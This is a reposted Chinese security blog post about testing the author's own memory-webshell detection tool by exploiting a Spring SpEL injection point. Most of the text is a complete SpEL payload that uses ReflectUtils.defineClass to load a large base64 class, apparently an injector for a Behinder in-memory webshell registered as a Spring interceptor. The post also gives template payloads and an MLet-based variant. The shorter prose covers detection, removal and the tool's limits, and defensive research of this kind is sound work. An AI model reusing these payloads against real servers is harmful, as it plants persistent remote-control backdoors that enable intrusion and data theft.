2026-01-28 07:00:33 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档记录利用SPEL漏洞注入冰蝎内存马测试自研查杀工具的实战。工具能检测并清除webshell实例，但因未删除JVM类定义，无法阻止重复注入。作者对比了实例与类文件清除思路的优劣，指出需增强类卸载能力以应对绕过手段，从而实现彻底查杀。 综合评分： 80 文章分类： 渗透测试,WEB安全,漏洞分析,实战经验

cover_image

利用一个spel漏洞点测试一下自己内存马查杀工具的强度

原创

洞洞拐洞洞拐

安服小兵洞洞拐

2026年1月27日 14:20 河南

·项目地址

https://github.com/h3ll0yoyo9527-techhttps://gitee.com/beiyouyun

1、测试点源码

·由于代码粘贴格式有问题，可以找项目地址下级目录的“测试点”文件夹

2、application/json注入冰蝎马以及检测

·poc

{"expr":"T(org.springframework.cglib.core.ReflectUtils).defineClass(\"您的注入器名称\",T(org.springframework.util.Base64Utils).decodeFromString(\"您的base64字符\"),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance()"}

·jmg生成

·终极完全体：

{"expr":"T(org.springframework.cglib.core.ReflectUtils).defineClass(\"org.apache.logging.fg.SOAPUtils\",T(org.springframework.util.Base64Utils).decodeFromString(\"yv66vgAAADEBRgEAH29yZy9hcGFjaGUvbG9nZ2luZy9mZy9TT0FQVXRpbHMHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQANZ2V0VXJsUGF0dGVybgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFMb3JnL2FwYWNoZS9sb2dnaW5nL2ZnL1NPQVBVdGlsczsBAAIvKggADAEADGdldENsYXNzTmFtZQEAJ29yZy5hcGFjaGUuV2hpdGVCbGFja0xpc3RQemtJbnRlcmNlcHRvcggADwEAD2dldEJhc2U2NFN0cmluZwEACkV4Y2VwdGlvbnMBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwATAQAQamF2YS9sYW5nL1N0cmluZwcAFQEJmEg0c0lBQUFBQUFBQUFJMVgrM3NUeHhVOW80ZFh5RXBJUkFETGJnT2tnVWd5V0k0REpyYVRnR1VNZHBBZGlvaGR4K2xqSlkwdFlTR0ozWldOYVpQU05IMi8yelNQdnRNWGFhR1VwQ0JEYUNoOWZQMmgvMUMvL3RMMHpPNWEySlpjODluZjdzeWRPL2ZlT2ZmY082dC8vZmY5MndBZXh6OEVIaXNic3dtOW9tZnpNakdaTDFneVdkU3pjNm1DYVowNFB6ZGFzcVNSbFJXcmJHZ1FBbHRQNi9ONm9xaVhaaE5EUmQwMFUyVTlKN25rRlRpbzdKZ1ZvMUNhblRIME0zS2hiTXdsRm1RbVlVcGp2aWl0eEtDNVdNcU82S1ZjVVJxcjdQb0Z4Q3h0UjZlVHNkUWFCd01DdnFGeVRncHNUaFZLY3J4NkppT05VM3FtU0VrNFZjN3F4UW5kS0tpNUsvUlorWUlwRUV2ZDQ3SG9RR1FFUE5OSmdkYWNuS0VUMjdIQWRzWXpPdG9ZVVFnUDRNRWdmQWdMdER4VktCV3Nad1RhbzJ2MUhHZ0dZaE4wa0tXMWRkWkRlQWhibGJVMkFXODBOcUhtN1dyZUliQ3BZa2dITUlHYzQrQmNIYzY4WlZVU0kzeWtIY0ZKZWJZcVRXdGdReld6VWk2WmNtQkZQTTlsVHN1c05SQjdRV0RMWGVud09ZVlFvVnpTc0VOQU02VnBjaUt3YzMwUHRnWVI5Wll6cDFYR2JHTlZxMUJNak9rVnlyZTZXN1BHSXJGUERCVXFlYWt5b0JsTzhHVGpQWjVTSUdDNEp4SFlHQnIzelBTVWR3aW8yTk1BZ01COWFZc3NZYkF1bTRKNXFiSTBUajZ2M3BHMkZOR1p2WDNvMmdRUEVnSzc3eWx5RFk4enNiUFNHckV0Qyt5Sk5wcU5OZlAwQlBhM29nY0h5Rk1ucWdtOVdKVWhISFFpZUZMZ2diVzdOUFFUcUd5NVpPbUZFaW5kc1lxbGVkMUlxNkJLV2NuY2gvQVVuZzVpQUdSemtQR2xsL1A5U0RTMlVjWkRPSXhCRlJ5TDZNRzdTUi9SelR5eDFIQWtpR0YwQkxDSENLL2loSVlSc3FWU1plYWZqRFltcEFsSEcwVWhQSXZqclJoRktvQm9BTHRZYjlVQVRyQVZWRmhtSVp4MDhFa0xQUHovajZIaGVhTEZZR3hneWNVbW1Xa1NFVXQyRXA5b3hRU21lSmJCNFhRQTAyNGhyV0c2aGs4eWVjUjJ0R1JhT21Gbm4xbzMrMnVySklSUDR6TkJmQXE2d0k1VkNtWkZaaE5wbVRXa2RWd3Vwam5Ud0k0VG9LUGtvaVdaZDE4ME5wME1RV0pHSlhqVzZXMU5ITnZkcHhCRURpeGZuMnB0U25YVTBUUmx0bW9Vck1VRW5kaXFSWnhSOFpSV0VjOUJSVVBGQ2NEdHBWdWl6ZnFvQVRPSXM2Q1R6V3NXTmN3TDNMKzgzMm1WQXBGR0svVXVlZzZMUVN6Z2ZKQ3Bibk1xN0tSYlllM0wyd3JsUkxJNk15TU5tWFBXdU84bHZLeUkrM21CYmMxMU5IekJialo2VGwxQUFnOUZtMWJuRi9GcUVLL2dTM1NkNmQxL1JHYnRTMnRicy9TcVZId0ZYMVdSZm8wZEtWYytXaWpwUlY0bTZnSlVpOS9BTnhXdzN3cEJRMENwZlllMEtjbUZ1N1JaSFVTOUVMNkg3eXNRZmtCYkxHeTlhS3BidFZtakQrR0hlRjFoL3dhTHZkN29UUldOSFRsUmE4bm9wdXpkejRKdWRpZlA2MGJ2Y2o5ZmMxMXcyWk9oS2YrOEtpTU5tMTErZEttaTcwcmFWZ1A0SlgzTmxOM091bnVESHJoTW1GL2pOK3A4djNVNmxBT3lFY0E3N00zVERlb2FmdS93WUV4YStYSk80SEFUTDQzYlZ2bzE1RXlSZ0NVY0N3emdNdjZnQXJoQ1JrODM0cXJocWtEYmV0czF2RWRVQzZYNThoeVAzTmNrTDAxTU5rM3pOVndQNGsrbzBaeVRyZ0J1a0d0bXRkUjFwbUJtdTVLRDZlRmxEaEtlOXdWQ2pwN0Q3QUQrekpUMGRQZGtNMzI5UFhyMlFGLzN3UU9aQUc0ekpTZWxvajVWN3RCNGN1NjhWWndMNEcvWVJSTDZRQkc4ZkxLajh1dFJxTHZQZmgrMDMzNk95RmMrTjNIMk5QVTlmRytLZDNvN2J5OWh5MVZPUEFqeTJVSVZvQjJ0Zkc1emxCRENmWUE5dWgrYnVTN1VaNUZyNmdSMWxGWmJ2SE1Ka1hqNEw5ZHhLaDcrNjNWMHg4Ti92NDYrZCt1V2c3YmVEbXpIemhYVzIrclcyeWpaN2xwdmQ2MFBVMGZGc3oyK2hJOXNiUHhqTlBHb2JUemtiSE9OQzN3VUQxT0RKc1VNajZoUmRxMHpmZzNkTjlIcndUL3h6dDBKQjMwMUhIb0xyM1hleEpCQXYrOFdocWVXY0xUZkgvR0hqMUU0NXNVa2grTjc2OFBuSWo1MzdBdC9uQVpPM2NRTFhvUmZ2SUZNZjB1a3hYOEx1U2tscmlFZmZuRUpjeldVYjhFekZhK2hXc05ubC9DNVNFdDhrcFl2Q05UdzVSdjRlZzNmcnVHN05id1c4ZGZ3NXVSRitQdDkzc3UreXp6SkxsekNGVUxvdGMvZHo1UUFqMUVhNDErY3piS1QyZDJMRWViL0ZET3ZJNEU4dXZFeWYwOWM0bGZLRldwY3hYNjhoMTRicHhGaUVXTnIzSVZIeUlrZUxCTERSOG1XUElhSTVXNWlSYVRxS2JxR1BmUWw3RkdVK3p6MktFNmZYdnBVV2ZEK0cxYzA3T1N2a2JjNFY2emNTZFRaVUYzMG42ZEZQMWRlRmFud3IyN2c0dGplOE8vRUhWeXE0WTk3K1g2M2hxWHhmWVFsZk5QM0FSYW12T0dCTkpmMmNYSjJ5aHZuZU9rTzNuYitVeGR4YUR4OHl6WkNwUHA5RVovYStNSEtqUkhmT2p1SlorZFZtN3BET01vWWovR3V1VkJIdFljbkJpOWpEdzZ4Wmc2akE0UFVHNlZta3BwSE1FWmlwamw3aWZoZG9PUVZISytqMlVGa2ZtUWpFc0F6K0RGK29qNXZpSkdTK2JqekNWZDJqUFovaXA5Umoyamc1M2FWZW1qcEYzYUpLVFJqOEg1SUp4NE5iRjV2UXhEWEQ5RUhuenZuMUpiOUJ5dkJ4djhBbzdjLzd6OE9BQUE9CAAXAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAZABoKABYAGwEAAygpVgEAB2NvbnRleHQBABJMamF2YS9sYW5nL09iamVjdDsBAAtpbnRlcmNlcHRvcgwAGQAdCgAEACEBAApnZXRDb250ZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMACMAJAoAAgAlAQAOZ2V0SW50ZXJjZXB0b3IMACcAJAoAAgAoAQAOYWRkSW50ZXJjZXB0b3IBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMACoAKwoAAgAsAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcALgEAEXJlcXVlc3RBdHRyaWJ1dGVzAQALaHR0cHJlcXVlc3QBAAdzZXNzaW9uAQAOc2VydmxldENvbnRleHQBABNhcHBsaWNhdGlvbkNvbnRleHRzAQAZTGphdmEvdXRpbC9MaW5rZWRIYXNoU2V0OwEAEmFwcGxpY2F0aW9uQ29udGV4dAEAC2NsYXNzTG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHADkBAA1TdGFja01hcFRhYmxlAQAQamF2YS9sYW5nL1RocmVhZAcAPAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAPgA/CgA9AEABABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DABCAEMKAD0ARAEAPG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5SZXF1ZXN0Q29udGV4dEhvbGRlcggARgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAEgASQoAOgBKAQAUZ2V0UmVxdWVzdEF0dHJpYnV0ZXMIAEwBAAxpbnZva2VNZXRob2QBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwwATgBPCgACAFABAApnZXRSZXF1ZXN0CABSAQAKZ2V0U2Vzc2lvbggAVAEAEWdldFNlcnZsZXRDb250ZXh0CABWAQBCb3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5zdXBwb3J0LldlYkFwcGxpY2F0aW9uQ29udGV4dFV0aWxzCABYAQAYZ2V0V2ViQXBwbGljYXRpb25Db250ZXh0CABaAQAPamF2YS9sYW5nL0NsYXNzBwBcAQAcamF2YXguc2VydmxldC5TZXJ2bGV0Q29udGV4dAgAXgEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwATgBgCgACAGEBADFvcmcuc3ByaW5nZnJhbWV3b3JrLmNvbnRleHQuc3VwcG9ydC5MaXZlQmVhbnNWaWV3CABjAQALbmV3SW5zdGFuY2UMAGUAJAoAXQBmCAA0AQAFZ2V0RlYMAGkATwoAAgBqAQAXamF2YS91dGlsL0xpbmtlZEhhc2hTZXQHAGwBAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMAG4AbwoAbQBwAQASamF2YS91dGlsL0l0ZXJhdG9yBwByAQAEbmV4dAwAdAAkCwBzAHUBADVvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LldlYkFwcGxpY2F0aW9uQ29udGV4dAgAdwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAeQB6CgAEAHsBABBpc0Fzc2lnbmFibGVGcm9tAQAUKExqYXZhL2xhbmcvQ2xhc3M7KVoMAH0AfgoAXQB/AQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HAIEBACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uBwCDAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcAhQEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uBwCHAQATamF2YS9sYW5nL1Rocm93YWJsZQcAiQEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247DAAOAAYKAAIAkwwAEQAGCgACAJUBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDACXAJgKAAIAmQEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDACbAJwKAAIAnQgAjQcAjAEAEWphdmEvbGFuZy9JbnRlZ2VyBwChAQAEVFlQRQwAowCQCQCiAKQBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAKYApwoAXQCoAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwCqAQANc2V0QWNjZXNzaWJsZQEABChaKVYMAKwArQoAqwCuAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMALAAsQoAogCyAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAC0ALUKAKsAtgEAFmFic3RyYWN0SGFuZGxlck1hcHBpbmcBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAKUxqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAHZ2V0QmVhbggAvQEAHHJlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcIAL8IALkBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwDCAQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDADEAMUKAMMAxgEADGRlY29kZXJDbGFzcwEAB2RlY29kZXIBAAdpZ25vcmVkAQAJYmFzZTY0U3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQAUTGphdmEvbGFuZy9DbGFzczwqPjsBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyCADOAQAHZm9yTmFtZQwA0ABJCgBdANEBAAxkZWNvZGVCdWZmZXIIANMBAAlnZXRNZXRob2QMANUApwoAXQDWAQAQamF2YS51dGlsLkJhc2U2NAgA2AEACmdldERlY29kZXIIANoBAAZkZWNvZGUIANwBAA5jb21wcmVzc2VkRGF0YQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAJpbgEAHkxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtOwEABnVuZ3ppcAEAH0xqYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbTsBAAZidWZmZXIBAAFuAQABSQEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwDoAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcA6gEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwDsCgDpACEBAAUoW0IpVgwAGQDvCgDrAPABABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABkA8goA7QDzAQAEcmVhZAEABShbQilJDAD1APYKAO0A9wEABXdyaXRlAQAHKFtCSUkpVgwA+QD6CgDpAPsBAAt0b0J5dGVBcnJheQEABCgpW0IMAP0A/goA6QD/AQAFc2V0RlYBADkoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9PYmplY3Q7KVYBAAR2YXIwAQAEdmFyMQEAA3ZhbAEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAQYBBwoAAgEIAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHAQoBAANzZXQMAQwAKwoBCwENAQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7CgELAK4BAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwB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\"),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance()"}

·访问，注入

·冰蝎连接

·查杀工具检测到，并且可以删除。

·注意，此工具只清除实例，并未删除类。由于类名重复，同一个冰蝎马不能再次注入。想清除类文件，可以使用jvm注入的方式的工具。是两种查杀思路，我是从实例进行处理，其他工具从类文件进行处理。各有各的问题，比如我的无法操作类文件：无法dump、类文件还在内存中(只卸载了类的实例)，其他工具通过反编译检测可能查不全。

·再生成个新的文件名注入。

3、application/x-www-form-urlencoded格式注入冰蝎马

·通过application/x-www-form-urlencoded格式一直出现base64格式非法，未找到具体原因。先不用这个。

T(org.springframework.cglib.core.ReflectUtils).defineClass('您的注入器名称',T(org.springframework.util.Base64Utils).decodeFromString('您的base64字符'),new&nbsp;javax.management.loading.MLet(new&nbsp;java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance()&nbsp;T(org.springframework.cglib.core.ReflectUtils).defineClass('您的注入器名称',T(org.springframework.util.Base64Utils).decodeFromString('您的base64字符'),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance()

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安服小兵洞洞拐洞洞拐洞洞拐《利用一个spel漏洞点测试一下自己内存马查杀工具的强度》